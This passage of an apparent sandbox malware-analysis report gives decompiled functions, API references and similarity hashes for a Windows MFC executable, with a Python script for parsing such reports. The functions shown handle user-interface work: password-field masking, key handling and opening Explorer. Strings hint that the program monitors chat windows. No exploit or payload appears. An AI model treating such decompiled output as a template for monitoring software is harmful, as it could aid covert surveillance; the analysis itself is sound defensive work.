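  • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
• #4129.MFC42(?,00000008), ref: 0040B324
Strings
Similarity
• String ID: Chat $IM with $Internet Explorer_Server$__oxFrame.class__
• API String ID: 1234111086-110528233
• Instruction Fuzzy Hash: A121B171801148BECF15DF61DC81ADE7B64EF16364F20816FF815661D1EB389B48D65C
C-Code - Quality: 42%
            E0041C252(void* __eax) {
            }
APIs
• #537.MFC42(None,0041C24D), ref: 0041C25C
• #537.MFC42(User defined,None,0041C24D), ref: 0041C26B
Strings
Similarity
• String ID: E-mail$Explore$None$Open$Print$User defined$WE$WE$WE
• Instruction Fuzzy Hash: DED0AC04F40E41D64524BF66E43357D9946CB9C7C7F50A15FBD021E2D38D4C4A5C452D
"""

HEADER_RE = re.compile(r"C-Code - Quality: (\d+)%\s+(E[0-9A-F]{8})\(")
# One API bullet; the optional group swallows the 'Part of subcall' prefix.
API_RE = re.compile(r"^\s*•\s+(?:Part of subcall function [0-9A-F]{8}:\s+)?"
                    r"([#\w]+)\.(\w+)")
STRING_ID_RE = re.compile(r"•\s+String ID:\s*(.*)")
FUZZY_RE = re.compile(r"•\s+Instruction Fuzzy Hash:\s*([0-9A-Fa-f]+)")


@dataclass
class FunctionRecord:
    name: str                   # decompiler symbol, e.g. E0040B2B5
    quality: int                # decompilation quality in percent
    direct_apis: list[tuple[str, str]] = field(default_factory=list)
    subcall_apis: list[tuple[str, str]] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)  # String ID split on '$'
    fuzzy_hash: str = ""        # Instruction Fuzzy Hash


def parse_report(text: str) -> list[FunctionRecord]:
    """Split the dump at each C-Code header and build one record per function."""
    records = []
    headers = list(HEADER_RE.finditer(text))
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        rec = FunctionRecord(name=m.group(2), quality=int(m.group(1)))
        in_apis = False
        for line in text[m.start():end].splitlines():
            stripped = line.strip()
            if stripped == "APIs":
                in_apis = True
                continue
            if stripped in ("Strings", "Memory Dump Source", "Similarity"):
                in_apis = False
            if in_apis:
                am = API_RE.match(line)
                if am:
                    bucket = rec.subcall_apis if "Part of subcall" in line else rec.direct_apis
                    bucket.append((am.group(1), am.group(2)))
                continue
            sm = STRING_ID_RE.search(line)
            if sm:  # keep trailing spaces: 'IM with ' is a prefix the sample compares
                rec.strings = [s for s in sm.group(1).split("$") if s]
                continue
            fm = FUZZY_RE.search(line)
            if fm:
                rec.fuzzy_hash = fm.group(1)
        records.append(rec)
    return records


def functions_referencing(records: list[FunctionRecord], needle: str) -> list[str]:
    """Names of functions whose String ID entries contain `needle`."""
    return [r.name for r in records if any(needle in s for s in r.strings)]


def api_usage(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Map 'api.MODULE' to the sorted names of functions that call it directly."""
    usage: dict[str, set[str]] = {}
    for r in records:
        for api, module in r.direct_apis:
            usage.setdefault(f"{api}.{module}", set()).add(r.name)
    return {k: sorted(v) for k, v in sorted(usage.items())}
```

    Run parse_report over the text of the whole C-Code section instead of SAMPLE_REPORT to get one FunctionRecord per function; functions_referencing(records, "mc.dat") then names the functions that touch that file, and api_usage(records) separates direct callers of an import from functions that only reach it through a helper, which is the distinction the "Part of subcall function" sub-bullets encode. The Instruction Fuzzy Hash per record can be compared across samples to spot the same function in a different build.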

    C-Code - Quality: 26%
    			E0040EA76(void* __ecx) {
    				struct tagRECT _v116;
    				void* __esi;
    				long _t35;
    				void* _t36;
    				void* _t37;
    				void* _t38;
    				void* _t59;
    				void* _t60;
    				void* _t79;
    				void* _t81;
    
    				_t81 = __ecx;
    				 *((intOrPtr*)(__ecx + 0x268)) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x64)) + 0x68c));
    				L0043DF94();
    				_t35 = GetSysColor(0xf);
    				_push("Verdana");
    				 *(_t81 + 0xb8) = _t35;
    				 *((intOrPtr*)(_t81 + 0xb0)) = 0x2bc;
    				 *((intOrPtr*)(_t81 + 0xac)) = 0xe;
    				L0043DDD2();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t81);
    				_push(1);
    				_t36 = L00404F47(_t35, _t81 + 0xd8, _t81);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t81);
    				_push(2);
    				_t37 = L00404F47(_t36, _t81 + 0x12c, _t81);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t81);
    				_push(0x3e8);
    				_t38 = L00404F47(_t37, _t81 + 0x180, _t81);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t81);
    				_push(0x3e9);
    				L00404F47(_t38, _t81 + 0x1d4, _t81);
    				GetWindowRect( *(_t81 + 0x248),  &_v116);
    				_push(0xffffffff);
    				_push(_v116.right - _v116.left - 5);
    				_push(0);
    				_push(0x4550cc);
    				_push(0);
    				L0043DF8E();
    				_t47 = L004044C9(SendMessageA( *(_t81 + 0x248), 0x1036, 0, 0x521), _t81 + 0x228, _t81) + 0xd50;
    				_t79 = 0;
    				 *((intOrPtr*)(_t81 + 0x60)) = _t47;
    				if( *((intOrPtr*)(_t47 + 0x4b0)) > 0) {
    					do {
    						_t60 = E0042855C(_t47, _t79);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(_t60);
    						_push(_t79);
    						_push(1);
    						L0043DF88();
    						_t47 =  *((intOrPtr*)(_t81 + 0x60));
    						_t79 = _t79 + 1;
    					} while (_t79 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x60)) + 0x4b0)));
    				}
    				_push(0x47a);
    				L0043E066();
    				SendMessageA( *( *((intOrPtr*)(_t81 + 0x64)) + 0x20), 0x14e,  *( *((intOrPtr*)(_t81 + 0x64)) + 0x358), 0);
    				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x13b) & 0x000000ff);
    				_push(0x421);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x148) & 0x000000ff);
    				_push(0x48d);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x149) & 0x000000ff);
    				_push(0x48e);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x14a) & 0x000000ff);
    				_push(0x48f);
    				L0043DF82();
    				E0040EC3F( *( *((intOrPtr*)(_t81 + 0x64)) + 0x14a) & 0x000000ff, _t81);
    				_t59 = 1;
    				return _t59;
    			}













    Instruction addresses (per-line address column of the decompiler view, condensed): 0x0040ea7c to 0x0040ec3e

    APIs
    • #4710.MFC42 ref: 0040EA8E
    • GetSysColor.USER32(0000000F), ref: 0040EA95
    • #860.MFC42 ref: 0040EAC0
    • GetWindowRect.USER32 ref: 0040EB31
    • #3996.MFC42(00000000,004550CC,00000000,?,000000FF,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0040EB56
    • SendMessageA.USER32(?,00001036,00000000,00000521), ref: 0040EB6C
    • #3998.MFC42(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040EB9B
    • #3092.MFC42(0000047A,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0040EBBC
    • SendMessageA.USER32(?,0000014E,?,00000000), ref: 0040EBCB
    • #1779.MFC42(00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080), ref: 0040EBE3
    • #1779.MFC42(0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF), ref: 0040EBFA
    • #1779.MFC42(0000048E,?,0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0040EC11
    • #1779.MFC42(0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040EC28
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1779$MessageSend$#3092#3996#3998#4710#860ColorRectWindow
    • String ID: Verdana
    • API String ID: 3503195851-987297809
    • Opcode ID: adf625c923e6a342d17d9bf64f87da7b644619d3b40200c7d210e334a5b75756
    • Instruction ID: 7e416f1695c23d7257579fcbb30e3f54af0e13ee50486b246f79fdcfb8abc44c
    • Opcode Fuzzy Hash: adf625c923e6a342d17d9bf64f87da7b644619d3b40200c7d210e334a5b75756
    • Instruction Fuzzy Hash: 9741B8703007047FD220AB66CC86FBB7BECEF85748F01046EB69A972D2CAB579448765
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 36%
    			E00419F1D() {
    				void* __ecx;
    				void* __esi;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				long _t23;
    				void* _t30;
    				void* _t33;
    				void* _t48;
    				void* _t51;
    
    				_t48 = _t33;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t48);
    				_push(1);
    				_t20 = L00404F47(_t19, _t48 + 0x138, _t48);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t48);
    				_push(2);
    				_t21 = L00404F47(_t20, _t48 + 0xe4, _t48);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t48);
    				_push(0xe005);
    				L00404F47(_t21, _t48 + 0x18c, _t48);
    				_t23 = GetSysColor(0xf); // 0xf = COLOR_3DFACE
    				_push("Verdana");
    				 *(_t48 + 0xb8) = _t23;
    				 *((intOrPtr*)(_t48 + 0xb0)) = 0x2bc;
    				 *((intOrPtr*)(_t48 + 0xac)) = 0xe;
    				L0043DDD2();
    				_push( *((intOrPtr*)(_t48 + 0x60)));
    				L0043E15C();
    				_push(0x43e);
    				L0043E066();
    				_push(0x43f);
    				L0043E066();
    				_push(0x438);
    				 *(_t51 + 0x14) = _t23;
    				L0043E066();
    				 *(_t51 + 0x20) = _t23;
    				SendMessageA( *(_t23 + 0x20), 0xcc, 0x2a, 0); // 0xcc = EM_SETPASSWORDCHAR, 0x2a = '*': this and the next two calls turn three edit controls into masked (password) fields
    				SendMessageA( *( *((intOrPtr*)(_t51 + 0x10)) + 0x20), 0xcc, 0x2a, 0);
    				SendMessageA( *( *(_t51 + 0x14) + 0x20), 0xcc, 0x2a, 0);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 0x64)) - 8)) == 0) {
    					_push(0);
    					L0043E07E();
    					_push(0);
    					_push(0x440);
    					L0043E066();
    					L0043E07E();
    				}
    				_t30 = 1;
    				return _t30;
    			}

    Statement addresses (one per C-code line above): 0x00419f23 to 0x0041a040

    APIs
    • #4710.MFC42 ref: 00419F25
    • GetSysColor.USER32(0000000F), ref: 00419F77
    • #860.MFC42 ref: 00419FA2
    • #6199.MFC42(?), ref: 00419FAD
    • #3092.MFC42(0000043E,?), ref: 00419FB9
    • #3092.MFC42(0000043F,0000043E,?), ref: 00419FC7
    • #3092.MFC42(00000438,0000043F,0000043E,?), ref: 00419FD7
    • SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 00419FF3
    • SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041A001
    • SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041A00F
    • #2642.MFC42(00000000), ref: 0041A01E
    • #3092.MFC42(00000440,00000000,00000000), ref: 0041A02B
    • #2642.MFC42(00000440,00000000,00000000), ref: 0041A032
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092$MessageSend$#2642$#4710#6199#860Color
    • String ID: Verdana
    • API String ID: 2639939461-987297809
    • Opcode ID: fbad95eec72c3054b1a0cc092a9b6a541f5b35b47187590ab61f9493c6e4b239
    • Instruction ID: 1eb3d388b0cfc98818dfb6084f2405a81ffd7390c4bb3f078a6351e00340efe2
    • Opcode Fuzzy Hash: fbad95eec72c3054b1a0cc092a9b6a541f5b35b47187590ab61f9493c6e4b239
    • Instruction Fuzzy Hash: F331C8713417047BE634AB22CC46F6BBAA9EF85B44F00042EB2866B2D1DEF56D44C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040E7FB(void* __ecx, intOrPtr _a4) {
    				char _v16;
    				struct HWND__* _t19;
    				signed char _t21;
    				void* _t27;
    				struct HWND__* _t28;
    				void* _t30;
    				intOrPtr _t32;
    				struct HWND__* _t36;
    				intOrPtr _t37;
    
    				_t37 = _a4;
    				_t30 = __ecx;
    				_t32 =  *((intOrPtr*)(_t37 + 4));
    				if(_t32 != 0x100) { // 0x100 = WM_KEYDOWN; any other message goes to the default handler at L13
    					L13:
    					_push(_t37);
    					L0043E042();
    					return 0x100;
    				}
    				if( *(_t37 + 8) != 0x1b) { // 0x1b = VK_ESCAPE
    					if(_t32 != 0x100 ||  *(_t37 + 8) != 0xd) { // 0xd = VK_RETURN
    						goto L13;
    					} else {
    						_push(GetFocus());
    						L0043DD9C();
    						_t19 = GetFocus();
    						_push(_t19);
    						L0043DD9C();
    						_t36 = _t19;
    						if(_t36 == 0) {
    							L12:
    							return 0;
    						}
    						_t21 = IsChild( *(_t30 + 0x20),  *(_t36 + 0x20));
    						if(_t21 == 0) {
    							goto L12;
    						}
    						L0043E18C();
    						if((_t21 & 0x00000010) == 0 || GetClassNameA( *(_t36 + 0x20),  &_v16, 0xa) == 0 || lstrcmpiA( &_v16, "EDIT") != 0) { // Enter is only forwarded when the focused child is an EDIT control with the tested style bit set
    							goto L12;
    						} else {
    							SendMessageA( *(_t36 + 0x20), 0x102,  *(_t37 + 8),  *(_t37 + 0xc)); // 0x102 = WM_CHAR: the Enter key is delivered to the edit control and reported as handled (return 1)
    							L11:
    							_t27 = 1;
    							return _t27;
    						}
    					}
    				}
    				_t28 = GetParent( *(__ecx + 0x20));
    				_push(_t28);
    				L0043DD9C();
    				PostMessageA( *(_t28 + 0x20), 0x111, 2, 0); // 0x111 = WM_COMMAND with wParam 2 = IDCANCEL: Escape closes the parent dialog
    				goto L11;
    			}

    Statement addresses (one per C-code line above; 0x00000000 marks a goto): 0x0040e803 to 0x0040e8d1

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2864$FocusMessage$#3797#5280ChildClassNameParentPostSendlstrcmpi
    • String ID: EDIT
    • API String ID: 3096995850-3080729518
    • Opcode ID: 6bc370d862fadc54a3551427a171b4c1f59a2f81c16ba3febfdf5fc77d724a31
    • Instruction ID: 4e5fcc6acbc7569e47a316d3ef0bed57315a39c88df923880ae25359ef0e8ee3
    • Opcode Fuzzy Hash: 6bc370d862fadc54a3551427a171b4c1f59a2f81c16ba3febfdf5fc77d724a31
    • Instruction Fuzzy Hash: 1C21DE32610604BBDB247B77DC49F6B3779AF8A341F10883AF542A35E1D778D8649B08
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E0041F1F6(void* __ecx) {
    				void* __esi;
    				void* _t19;
    				void* _t20;
    				char** _t21;
    				void* _t22;
    				char* _t34;
    				void* _t36;
    
    				_t19 = E0043E4E0(0x441d04, _t36);
    				_push(0x421);
    				L0043DFA6();
    				if(_t19 != 0) {
    					_push("/select,\"");
    					L0043DE26();
    					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    					_push("${>n");
    					_push(_t19);
    					_t20 = _t36 - 0x14;
    					_push(_t20);
    					L0043E282();
    					_push("\"");
    					_push(_t20);
    					_t21 = _t36 - 0x10;
    					 *(_t36 - 4) = 1;
    					_push(_t21);
    					L0043DE20();
    					_t34 =  *_t21;
    					 *(_t36 - 4) = 2;
    					_t22 = L004044C9(_t21, _t36 - 0x18, _t34);
    					if(_t22 != 0) {
    						_t22 =  *(_t22 + 0x20);
    					}
    					_t19 = ShellExecuteA(_t22, "open", "explorer.exe", _t34, 0, 5); // 5 = SW_SHOW; runs explorer.exe /select,"<path>" to highlight the file in an Explorer window
    					 *(_t36 - 4) = 1;
    					L0043DD36();
    					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    					L0043DD36();
    					 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				L0043E2FA();
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return _t19;
    			}

    Statement addresses (one per C-code line above): 0x0041f1fb to 0x0041f2ac

    APIs
    • __EH_prolog.LIBCMT ref: 0041F1FB
    • #4055.MFC42(00000421), ref: 0041F20B
    • #537.MFC42(/select,",?,00000421), ref: 0041F221
    • #922.MFC42(00000421,00000000,${>n,/select,",?,00000421), ref: 0041F234
    • #924.MFC42(?,00000000,004548B8,00000421,00000000,${>n,/select,",?,00000421), ref: 0041F247
    • ShellExecuteA.SHELL32(00000000,open,explorer.exe,?,00000000,00000005), ref: 0041F26E
    • #800.MFC42(?,00000000,00000005,?,00000421), ref: 0041F27B
    • #800.MFC42(?,00000000,00000005,?,00000421), ref: 0041F287
    • #800.MFC42(?,00000000,00000005,?,00000421), ref: 0041F293
    • #5161.MFC42(00000421), ref: 0041F29B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#4055#5161#537#922#924ExecuteH_prologShell
    • String ID: ${>n$/select,"$explorer.exe$open
    • API String ID: 682272949-2604038753
    • Opcode ID: 52f82f90beef8db5995bdc2703380edd49ba869a6ec1031d9ba9344e98fbd39b
    • Instruction ID: 1a375c3a1a99139046450a7a1fe31146c13ed73abeb3b8490a23ee0cf79039e2
    • Opcode Fuzzy Hash: 52f82f90beef8db5995bdc2703380edd49ba869a6ec1031d9ba9344e98fbd39b
    • Instruction Fuzzy Hash: F311E7B1D00245AADB10F7A5DD06BEEBB789F55319F10015FF401B71D2DBBC5A08C669
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E004188B4(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    Statement addresses (one per C-code line above): 0x004188b4 to 0x0041890e

    APIs
    • #537.MFC42(None,004188AF), ref: 004188BE
    • #537.MFC42(User defined,None,004188AF), ref: 004188CD
    • #537.MFC42(Open,User defined,None,004188AF), ref: 004188DC
    • #537.MFC42(Print,Open,User defined,None,004188AF), ref: 004188EB
    • #537.MFC42(Explore,Print,Open,User defined,None,004188AF), ref: 004188FA
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,004188AF), ref: 00418909
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined$SE$SE
    • API String ID: 4256512136-2891978170
    • Opcode ID: d21227f8dcd24c2f2545172f5f666970d50dc86f48fb4cad6cf92c6d8b92661d
    • Instruction ID: 62499ee41602d7bb0a4c6d1ec5dc37722d9a59901eb963447052dcfeeb6ed208
    • Opcode Fuzzy Hash: d21227f8dcd24c2f2545172f5f666970d50dc86f48fb4cad6cf92c6d8b92661d
    • Instruction Fuzzy Hash: 75D0AC10F80E44D145287E56E47353D5842CB9C7C7750A15FBD061E1D38DCC4A5C452D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0041BA2F(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    Statement addresses (one per C-code line above): 0x0041ba2f to 0x0041ba89

    APIs
    • #537.MFC42(None,0041BA2A), ref: 0041BA39
    • #537.MFC42(User defined,None,0041BA2A), ref: 0041BA48
    • #537.MFC42(Open,User defined,None,0041BA2A), ref: 0041BA57
    • #537.MFC42(Print,Open,User defined,None,0041BA2A), ref: 0041BA66
    • #537.MFC42(Explore,Print,Open,User defined,None,0041BA2A), ref: 0041BA75
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041BA2A), ref: 0041BA84
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
